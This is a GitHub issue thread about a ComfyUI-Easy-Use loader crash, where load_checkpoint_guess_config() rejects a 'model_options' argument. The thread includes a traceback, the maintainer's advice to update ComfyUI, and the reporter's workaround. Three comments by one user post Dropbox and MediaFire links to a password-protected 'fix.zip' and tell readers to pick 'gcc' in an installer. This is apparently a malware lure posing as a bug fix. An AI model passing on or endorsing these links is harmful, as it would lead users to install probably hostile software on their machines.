### ISSUE TITLE
EasyLoader(A1111) load model error 

### ISSUE THREAD

**Issue by CatDroid** [yolain/ComfyUI-Easy-Use#351]
comfy.sd.load_checkpoint_guess_config  has not argument named  "model_options=model_options  " 

call stack followed: 

```
!!! Exception during processing!!! load_checkpoint_guess_config() got an unexpected keyword argument 'model_options'
Traceback (most recent call last):
  File "/data/github/ComfyUI/execution.py", line 152, in recursive_execute
    output_data, output_ui = get_output_data(obj, input_data_all)
  File "/data/github/ComfyUI/execution.py", line 82, in get_output_data
    return_values = map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True)
  File "/data/github/ComfyUI/execution.py", line 75, in map_node_over_list
    results.append(getattr(obj, func)(**slice_dict(input_data_all, i)))
  File "/data/github/ComfyUI/custom_nodes/ComfyUI-Easy-Use/py/easyNodes.py", line 1026, in a1111loader
    return super().adv_pipeloader(ckpt_name, 'Default', vae_name, clip_skip,
  File "/data/github/ComfyUI/custom_nodes/ComfyUI-Easy-Use/py/easyNodes.py", line 929, in adv_pipeloader
    model, clip, vae, clip_vision, lora_stack = easyCache.load_main(ckpt_name, config_name, vae_name, lora_name, lora_model_strength, lora_clip_strength, optional_lora_stack, model_override, clip_override, vae_override, prompt)
  File "/data/github/ComfyUI/custom_nodes/ComfyUI-Easy-Use/py/libs/loader.py", line 459, in load_main
    model, clip, vae, clip_vision = self.load_checkpoint(ckpt_name, config_name)
  File "/data/github/ComfyUI/custom_nodes/ComfyUI-Easy-Use/py/libs/loader.py", line 245, in load_checkpoint
    loaded_ckpt = comfy.sd.load_checkpoint_guess_config(ckpt_path, output_vae=True, output_clip=output_clip, output_clipvision=output_clipvision, embedding_directory=folder_paths.get_folder_paths("embeddings"), model_options=model_options)
TypeError: load_checkpoint_guess_config() got an unexpected keyword argument 'model_options'
```

comfyui veriosn:
commit 75b9b55b221fc95f7137a91e2349e45693e342b8
Author: comfyanonymous <comfyanonymous@protonmail.com>
Date:   Sat Aug 10 21:28:24 2024 -0400

EasyUse version
Last Update : 2024-08-24

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by flysssss** [comment]
same  error

**Comment by yolain** [comment]
update comfyui

**Comment by CatDroid** [comment]
model_options is {} empty now, so i try to remove model_options=model_options temperately.
Thanks.
